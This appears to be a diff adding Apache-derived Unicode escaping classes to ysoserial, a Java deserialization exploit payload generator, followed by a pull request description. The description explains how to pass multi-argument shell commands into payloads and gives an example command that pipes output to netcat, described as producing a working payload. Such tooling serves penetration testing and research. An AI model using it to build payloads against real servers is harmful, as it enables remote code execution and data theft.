+     *            int value representing the highest codepoint boundary
+     * @param between
+     *            whether to escape between the boundaries or outside them
+     */
+    public JavaUnicodeEscaper(final int below, final int above, final boolean between) {
+        super(below, above, between);
+    }
+
+    /**
+     * Converts the given codepoint to a hex string of the form {@code "\\uXXXX\\uXXXX"}.
+     *
+     * @param codepoint
+     *            a Unicode code point
+     * @return the hex string for the given codepoint
+     */
+    @Override
+    protected String toUtf16Escape(final int codepoint) {
+        final char[] surrogatePair = Character.toChars(codepoint);
+        return "\\u" + hex(surrogatePair[0]) + "\\u" + hex(surrogatePair[1]);
+    }
+
+}

--- a/src/main/java/ysoserial/translate/LookupTranslator.java
+++ b/src/main/java/ysoserial/translate/LookupTranslator.java
@@ -1,0 +1,104 @@
+/*
+ * Licensed to the Apache Software Foundation (ASF) under one or more
+ * contributor license agreements.  See the NOTICE file distributed with
+ * this work for additional information regarding copyright ownership.
+ * The ASF licenses this file to You under the Apache License, Version 2.0
+ * (the "License"); you may not use this file except in compliance with
+ * the License.  You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package ysoserial.translate;
+
+import java.io.IOException;
+import java.io.Writer;
+import java.security.InvalidParameterException;
+import java.util.HashMap;
+import java.util.HashSet;
+import java.util.Iterator;
+import java.util.Map;
+
+/**
+ * Translates a value using a lookup table.
+ *
+ * @since 1.0
+ */
+public class LookupTranslator extends CharSequenceTranslator {
+
+    /** The mapping to be used in translation. */
+    private final Map<String, String> lookupMap;
+    /** The first character of each key in the lookupMap. */
+    private final HashSet<Character> prefixSet;
+    /** The length of the shortest key in the lookupMap. */
+    private final int shortest;
+    /** The length of the longest key in the lookupMap. */
+    private final int longest;
+
+    /**
+     * Define the lookup table to be used in translation
+     *
+     * Note that, as of Lang 3.1 (the orgin of this code), the key to the lookup
+     * table is converted to a java.lang.String. This is because we need the key
+     * to support hashCode and equals(Object), allowing it to be the key for a
+     * HashMap. See LANG-882.
+     *
+     * @param lookupMap Map&lt;CharSequence, CharSequence&gt; table of translator
+     *                  mappings
+     */
+    public LookupTranslator(final Map<CharSequence, CharSequence> lookupMap) {
+        if (lookupMap == null) {
+            throw new InvalidParameterException("lookupMap cannot be null");
+        }
+        this.lookupMap = new HashMap<String, String>();
+        this.prefixSet = new HashSet<Character>();
+        int currentShortest = Integer.MAX_VALUE;
+        int currentLongest = 0;
+        Iterator<Map.Entry<CharSequence, CharSequence>> it = lookupMap.entrySet().iterator();
+
+        while (it.hasNext()) {
+            Map.Entry<CharSequence, CharSequence> pair = it.next();
+            this.lookupMap.put(pair.getKey().toString(), pair.getValue().toString());
+            this.prefixSet.add(pair.getKey().charAt(0));
+            final int sz = pair.getKey().length();
+            if (sz < currentShortest) {
+                currentShortest = sz;
+            }
+            if (sz > currentLongest) {
+                currentLongest = sz;
+            }
+        }
+        this.shortest = currentShortest;
+        this.longest = currentLongest;
+    }
+
+    /**
+     * {@inheritDoc}
+     */
+    @Override
+    public int translate(final CharSequence input, final int index, final Writer out) throws IOException {
+        // check if translation exists for the input at position index
+        if (prefixSet.contains(input.charAt(index))) {
+            int max = longest;
+            if (index + longest > input.length()) {
+                max = input.length() - index;
+            }
+            // implement greedy algorithm by trying maximum match first
+            for (int i = max; i >= shortest; i--) {
+                final CharSequence subSeq = input.subSequence(index, index + i);
+                final String result = lookupMap.get(subSeq.toString());
+
+                if (result != null) {
+                    out.write(result);
+                    return i;
+                }
+            }
+        }
+        return 0;
+    }
+}

--- a/src/main/java/ysoserial/translate/UnicodeEscaper.java
+++ b/src/main/java/ysoserial/translate/UnicodeEscaper.java
@@ -1,0 +1,140 @@
+/*
+ * Licensed to the Apache Software Foundation (ASF) under one or more
+ * contributor license agreements.  See the NOTICE file distributed with
+ * this work for additional information regarding copyright ownership.
+ * The ASF licenses this file to You under the Apache License, Version 2.0
+ * (the "License"); you may not use this file except in compliance with
+ * the License.  You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package ysoserial.translate;
+
+import java.io.IOException;
+import java.io.Writer;
+
+/**
+ * Translates codepoints to their Unicode escaped value.
+ *
+ * @since 1.0
+ */
+public class UnicodeEscaper extends CodePointTranslator {
+
+    /** int value representing the lowest codepoint boundary. */
+    private final int below;
+    /** int value representing the highest codepoint boundary. */
+    private final int above;
+    /** whether to escape between the boundaries or outside them. */
+    private final boolean between;
+
+    /**
+     * <p>Constructs a <code>UnicodeEscaper</code> for all characters.
+     * </p>
+     */
+    public UnicodeEscaper() {
+        this(0, Integer.MAX_VALUE, true);
+    }
+
+    /**
+     * <p>Constructs a <code>UnicodeEscaper</code> for the specified range. This is
+     * the underlying method for the other constructors/builders. The <code>below</code>
+     * and <code>above</code> boundaries are inclusive when <code>between</code> is
+     * <code>true</code> and exclusive when it is <code>false</code>. </p>
+     *
+     * @param below int value representing the lowest codepoint boundary
+     * @param above int value representing the highest codepoint boundary
+     * @param between whether to escape between the boundaries or outside them
+     */
+    protected UnicodeEscaper(final int below, final int above, final boolean between) {
+        this.below = below;
+        this.above = above;
+        this.between = between;
+    }
+
+    /**
+     * <p>Constructs a <code>UnicodeEscaper</code> below the specified value (exclusive). </p>
+     *
+     * @param codepoint below which to escape
+     * @return the newly created {@code UnicodeEscaper} instance
+     */
+    public static UnicodeEscaper below(final int codepoint) {
+        return outsideOf(codepoint, Integer.MAX_VALUE);
+    }
+
+    /**
+     * <p>Constructs a <code>UnicodeEscaper</code> above the specified value (exclusive). </p>
+     *
+     * @param codepoint above which to escape
+     * @return the newly created {@code UnicodeEscaper} instance
+     */
+    public static UnicodeEscaper above(final int codepoint) {
+        return outsideOf(0, codepoint);
+    }
+
+    /**
+     * <p>Constructs a <code>UnicodeEscaper</code> outside of the specified values (exclusive). </p>
+     *
+     * @param codepointLow below which to escape
+     * @param codepointHigh above which to escape
+     * @return the newly created {@code UnicodeEscaper} instance
+     */
+    public static UnicodeEscaper outsideOf(final int codepointLow, final int codepointHigh) {
+        return new UnicodeEscaper(codepointLow, codepointHigh, false);
+    }
+
+    /**
+     * <p>Constructs a <code>UnicodeEscaper</code> between the specified values (inclusive). </p>
+     *
+     * @param codepointLow above which to escape
+     * @param codepointHigh below which to escape
+     * @return the newly created {@code UnicodeEscaper} instance
+     */
+    public static UnicodeEscaper between(final int codepointLow, final int codepointHigh) {
+        return new UnicodeEscaper(codepointLow, codepointHigh, true);
+    }
+
+    /**
+     * {@inheritDoc}
+     */
+    @Override
+    public boolean translate(final int codepoint, final Writer out) throws IOException {
+        if (between) {
+            if (codepoint < below || codepoint > above) {
+                return false;
+            }
+        } else {
+            if (codepoint >= below && codepoint <= above) {
+                return false;
+            }
+        }
+
+        if (codepoint > 0xffff) {
+            out.write(toUtf16Escape(codepoint));
+        } else {
+          out.write("\\u");
+          out.write(HEX_DIGITS[(codepoint >> 12) & 15]);
+          out.write(HEX_DIGITS[(codepoint >> 8) & 15]);
+          out.write(HEX_DIGITS[(codepoint >> 4) & 15]);
+          out.write(HEX_DIGITS[(codepoint) & 15]);
+        }
+        return true;
+    }
+
+    /**
+     * Converts the given codepoint to a hex string of the form {@code "\\uXXXX"}.
+     *
+     * @param codepoint
+     *            a Unicode code point
+     * @return the hex string for the given codepoint
+     *
+     */
+    protected String toUtf16Escape(final int codepoint) {
+        return "\\u" + hex(codepoint);
+    }
+}


### PR DESCRIPTION
This merge requests adds the support for multiple arguments.

It is currently impossible to use operators like <, > or | since ysoserial uses [java.lang.Runtime.exec(String command)](https://docs.oracle.com/javase/7/docs/api/java/lang/Runtime.html#exec(java.lang.String)) which splits a command with spaces.
A command such as `sh -c "ls | nc 127.0.0.1 8000"` is interpreted as `["sh", "-c", "\"ls", "|", "nc" "127.0.0.1", "8000"]`.

This merge request modifies the way the arguments are passed to `exec` by adding the `arguments` parameter.

It is now possible to call ysoserial this way :

```
java -jar ysoserial.jar CommonsCollections2 "sh" "-c" "ls | nc 127.0.0.1 8000"
```

This will generate a working payload. I also took the liberty of using `StringEscapeUtils` to escape the command in ysoserial.payloads.util.Gadgets.

Please let me know if i should cleanup some stuff if you want to accept the pull request.